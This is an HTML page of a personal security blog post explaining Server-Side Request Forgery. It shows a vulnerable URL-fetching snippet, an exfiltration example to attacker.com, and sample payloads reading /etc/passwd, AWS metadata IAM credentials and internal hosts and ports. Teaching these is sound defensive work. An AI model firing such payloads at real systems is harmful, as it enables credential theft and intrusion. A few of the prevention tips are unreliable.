<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta name="description" content="Cyber Security Engineer">
    <meta name="author" content="Samuel Kwaku Addison">

    <meta property="og:site_name" content="Samuel K. Addison - Website" />
    <meta property="og:title" content="Server Side Request Forgery" />
    <meta property="og:description" content="Cyber Security Engineer writes about SSRF attack and how best to prevent these attacks." />
    <meta property="og:image" content="https://github.com/SamAddy/samaddy.github.io/raw/main/images/favicon.ico" />
    <meta property="og:type" content="article" />
    <meta property="og:url" content="https://samaddy.github.io/Blog/ssrf-attack.html">

    <title>Server Side Request Forgery | Samuel K. Addison - Cyber Security Engineer</title>

    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,600;0,700;1,400&family=Poppins:wght@600&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://kit.fontawesome.com/997d814be9.css" crossorigin="anonymous">
    <link href="https://getbootstrap.com/docs/5.2/assets/css/docs.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.24.1/themes/prism-okaidia.min.css" rel="stylesheet" />
 

    <link href="css/style.css" rel="stylesheet">

    <link rel="icon" href="/images/favicon.png">

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://kit.fontawesome.com/997d814be9.js" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.8/clipboard.min.js"></script>
    

    <!-- <script>
        document.addEventListener('DOMContentLoaded', function() {
            const currentLocation = location.href;
            const navLinks = document.querySelectorAll('.nav-link');
            navLinks.forEach(link => {
            if (link.href === currentLocation) {
                link.classList.add('current');
            }
            });
        });
    </script> -->

    <!-- Google tag (gtag.js) -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-10C9B08WGE"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
    
        gtag('config', 'G-10C9B08WGE');
    </script>

    <style>
        body {
            background: #130a3f;
            font-family: 'Open Sans', Helvetica, sans-serif;
            color: #7E7E7E;
        }

        h1 {
            color: #fff;
            font-weight: 900;
            font-size: 2.2rem;
            line-height: 3.25rem;
            font-family: 'inter', sans-serif;
            margin-top: 1.5rem;
            text-decoration: none;
            text-align: center;
        }

        .nav a:link {
            color: #fff;
        }

        .nav a:hover, a:active{
            color: #fff;
            text-decoration: underline;
            text-underline-offset: 3px;
        }

        .container-fluid a:hover {
            text-decoration: none;
        }

        .nav-link{
            color: #fff;
        }

        .active {
            text-decoration: underline;
            text-underline-offset: 3px;
        }
        
        .container-fluid h1 {
            margin-top: 2.0rem;
            font-family: "inter", sans-serif;
            font-size: 32px;
        }

        /* blog styling */
        .blog h2 {
            font-weight: 400;
            padding-top: 10px;
            padding-bottom: 10px;
            color: #08a0e9;
        }
        .content p {
            color: #ffff;
        }

        .copy-code {
            position: absolute;
        /*  top: 0; */
        /*  right: 0; */
            cursor: pointer;
        }

        .payloads li {
            padding-top: 10px;
            padding-bottom: 10px;
        }


        /* socials and copyright */
        .socials-copyright {
            /* display: flex; */
            padding-top: 5rem;
            text-align: center;
            bottom: 0;
            right: 0;
            width: 100%;
        }

        .social-container a {
            text-decoration: none;
            color: #fff;
        }

        .social-container a:hover {
            text-decoration: none;
        }

        .fa-twitter {
            color: #08a0e9;
        }

        .fa-youtube {
            color: #FF0000;
        }

        .p-small {
            margin-top: 10px;
            color: #fff;
            font-size: 15px;
        }

        time {
            text-align: center;

        }
        
        article {
        position: relative;
        padding: 20px;
        z-index: 2;

        max-width:calc(100vw - 4rem);
        width:60rem;
        margin:0 auto
        }

        .caption {
            text-align: center;
        }

        .caption time {
            font-size: small;
        }

        .blog li {
            color: #fff;
        }

        .screenshot {
            text-align: center;
            padding-top: 10px;
            padding-bottom: 10px;
        }

       
        @media screen and (max-width: 780px) {
            article {
                max-width:100%;
                margin:0 auto
            }
            code {
                max-width: 100%;
            }
            .screenshot img {
                max-width: 100%;
            }
            .contact-container {
                margin-left: 15px;
                margin-right: 15px;
            }

            .p-small {
                margin-top: 0px;
            } 
        }

    </style>
</head>
<body data-spy="scroll" data-target=".fixed-top">
    <section>
        <div class="container-fluid">
            <h1><a class="navbar-brand" href="https://samaddy.github.io/">Samuel K. Addison</a></h1>
        </div>
        <div class="container">
            <ul class="nav justify-content-center">
                <li class="nav-item">
                  <a class="nav-link" href="https://samaddy.github.io/">Home</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link" href="https://samaddy.github.io/Projects/projects.html">Projects</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link active" aria-current="page" href="https://samaddy.github.io/Blog/blog.html">Blog</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://samaddy.github.io/contact.html">Contact</a>
                  </li>
              </ul>
        </div>
    </section>

    <article class="blog">
        <div class="caption">
            <time datetime="2023-03-10">Friday, March 10, 2023</time>
            <h1>Server Side Request Forgery</h1>
        </div>
    
        <div class="content">
            <p>
                Server-Side Request Forgery (SSRF) is a type of web application vulnerability that allows an attacker to make unauthorized requests from a web server. 
                This can result in sensitive data being exposed, or even complete compromise of the affected system. In this blog post, we will explore how SSRF attacks 
                work and provide some sample payloads to help you test your applications for this vulnerability.
            </p>
            
            <h2>How SSRF Attacks Work</h2>
            <p>
                An SSRF attack occurs when an attacker can control the URL parameter of a web application that makes a request to a third-party server. 
                The attacker can craft a malicious URL that tricks the application into making a request to a server controlled by the attacker. 
                This can be used to exfiltrate sensitive data or perform other unauthorized actions.
            </p>
            <p>
                For example, suppose a web application has a feature that allows users to enter a URL to fetch data from a remote server. 
                The application might use the following code to make the request:
            </p>

            <div class="code-snippet">
                <div class="copy-code">&#x1F4CB;</div>
                <pre><code class="language-bash" data-clipboard-text="url = request.args.get('url')
                    response = requests.get(url)">
                    url = request.args.get('url')
                    response = requests.get(url)
                </code></pre>
            </div>

            <p>
                If the <code>url</code> parameter is not properly validated or sanitized, an attacker can craft a URL that points to a server they control, like this:
            </p>
            <div class="code-snippet">
                <div class="copy-code">&#x1F4CB;</div>
                <pre><code class="language-bash" data-clipboard-text='http://attacker.com?data=sensitive_data'>
                    http://attacker.com?data=sensitive_data
                </code></pre>
            </div>

            <p>
                When the web application fetches this URL, it will send the <code>sensitive_data</code> to the attacker's server. 
                The attacker can then use this information for malicious purposes.
            </p>
            <div class="payloads">
                <h2>Sample Payloads</h2>
                <ul>
                    <li>
                        Fetch the contents of a local file:
                    </li>
                    <div class="code-snippet">
                        <div class="copy-code">&#x1F4CB;</div>
                        <pre><code class="language-bash" data-clipboard-text='http://example.com/?url=file:///etc/passwd'>
                                    http://example.com/?url=file:///etc/passwd
                                </code></pre>
                    </div>
                    <li>
                        Fetch the contents of a remote file:
                    </li>
                    <div class="code-snippet">
                        <div class="copy-code">&#x1F4CB;</div>
                        <pre><code class="language-bash" data-clipboard-text='http://example.com/?url=http://attacker.com/malicious_file.txt'>
                                    http://example.com/?url=http://attacker.com/malicious_file.txt
                                </code></pre>
                    </div>
                    <li>
                        Fetch the contents of a web page that is only accessible from the internal network:
                    </li>
                    <div class="code-snippet">
                        <div class="copy-code">&#x1F4CB;</div>
                        <pre><code class="language-bash" data-clipboard-text='http://example.com/?url=http://internal_server.local/private_data.html'>
                                    http://example.com/?url=http://internal_server.local/private_data.html
                                </code></pre>
                    </div>
                    <li>
                        Exfiltrate AWS metadata:
                    </li>
                    <div class="code-snippet">
                        <div class="copy-code">&#x1F4CB;</div>
                        <pre><code class="language-bash" data-clipboard-text='http://example.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin'>
                                    http://example.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin
                                </code></pre>
                    </div>
                    <li>
                        Scan internal network ports:
                    </li>
                    <div class="code-snippet">
                        <div class="copy-code">&#x1F4CB;</div>
                        <pre><code class="language-bash" data-clipboard-text='http://example.com/?url=http://internal_server.local:22'>
                                    http://example.com/?url=http://internal_server.local:22
                                </code></pre>
                    </div>
                </ul>
                <p>
                    These are just a few examples of the types of payloads that can be used to test for SSRF vulnerabilities.
                    It is important to note that testing for SSRF vulnerabilities should only be done on systems that you have
                    permission to test on.
                    Testing on systems without permission can result in legal consequences.
                </p>
            </div>

            <h2>Preventing SSRF Attacks</h2>
            <p>
                The best way to prevent SSRF attacks is to properly validate and sanitize all user inputs, especially 
                those that are used to make requests to external servers. Here are some tips to prevent SSRF attacks:
            </p>
            
            <ul>
                <li>
                    Whitelist the allowed protocols and domains in URLs. For example, only allow HTTP and HTTPS protocols, 
                    and only allow requests to specific domains.
                </li>
                <li>
                    Use a proxy server to restrict requests to authorized domains and IP addresses.
                </li>
                <li>
                    Use relative URLs instead of absolute URLs when making requests to external servers.
                </li>
                <li>
                    Use short DNS TTLs to prevent DNS cache poisoning attacks.
                </li>
                <li>
                    Monitor outgoing requests for unusual activity.
                </li>
            </ul>

            <h2>Conclusion</h2>
            
            <p>
                SSRF attacks are a serious web application vulnerability that can be used to steal sensitive data or compromise a system. 
                By properly validating and sanitizing all user inputs, you can prevent these types of attacks. Use the sample payloads provided 
                in this blog post to test your applications for SSRF vulnerabilities, and be sure to test on systems that you have permission to test on.
            </p>

            <h2>References</h2>
            <ul>
                <li><a href="https://portswigger.net/web-security/ssrf">Server-side request forgery (SSRF)</a></li>
                <li><a href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery">https://owasp.org/www-community/attacks/Server_Side_Request_Forgery</a></li>
                <li><a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf">Make SSRF great again.</a></li>
            </ul>

        </div>
    
    </article>

    <section class="socials-copyright">
        <div class="footer">
            <div class="container">
                <div class="row">
                    <div class="col-lg-12">
                        <div class="social-container">
                            <span class="fa-stack">
                                <a href="https://github.com/SamAddy">
                                    <i class="fab fa-github fa-stack-1x"></i>
                                </a>
                            </span>
                            <span class="fa-stack">
                                <a href="https://www.linkedin.com/in/samuel-k-addison/">
                                    <i class="fa-brands fa-linkedin-in fa-stack-1x"></i>
                                </a>
                            </span>
                            <span class="fa-stack">
                                <a href="https://twitter.com/Prof_Addy">
                                    <i class="fa-brands fa-twitter fa-stack-1x"></i>
                                </a>
                            </span>
                            <span class="fa-stack">
                                <a href="https://www.youtube.com/@profaddy">
                                    <i class="fa-brands fa-youtube fa-stack-1x"></i>
                                </a>
                            </span>
                        </div> 
                    </div> 
                </div> 
            </div> 
        </div> 


         <div class="copyright">
            <div class="container">
                <div class="row">
                    <div class="col-lg-12">
                        <p class="p-small">© <script>document.write(new Date().getFullYear())</script> - SamAddy</p>
                    </div> 
                </div> 
            </div> 
        </div> 
    </section>



    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.7/dist/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.24.1/components/prism-core.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.24.1/plugins/autoloader/prism-autoloader.min.js"></script>
    <script>hljs.highlightAll();</script>
</body>
</html>